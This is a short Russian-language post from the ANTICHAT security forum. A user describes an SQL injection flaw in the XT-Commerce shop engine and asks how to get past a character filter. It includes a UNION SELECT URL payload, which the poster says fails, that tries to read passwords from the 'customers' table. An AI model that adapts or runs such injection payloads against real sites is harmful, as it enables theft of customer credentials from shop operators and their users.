HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 22.09.2010, 21:47
Star_s
Новичок
Регистрация: 04.02.2010
Сообщений: 13
С нами: 8560517

Репутация: 0
По умолчанию

Всем привет!

В движке XT-Commerce есть уязвимость - SQL-injection:

Цитата:
Сообщение от None  
http://site.com/index.php?cat=
SQL-inj
Но, т.к. генерируемые самим движком ссылки имеют примерно такой вид:

Цитата:
Сообщение от None  
http://site.com/index.php?cat=
с
197
Цитата:
Сообщение от None  
http://site.com/index.php?cPath=197
_
6694
т.е. содержат символы с и _, то скрипт их вырезает. Поэтому нельзя, например сделать выборку из таблицы, в имени которой есть буква с или _.

Пробовал обойти это, заюзав переменные, вроде:

Цитата:
Сообщение от None  
http://site.com/index.php?cat=-1+union+select+(@a:=0x637573746F6D657273),2,3,pass word+from+@a%23
0x637573746F6D657273=(customers)

Но этот номер не прокатывает.

Кто-нибудь знает, как можно обойти?
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.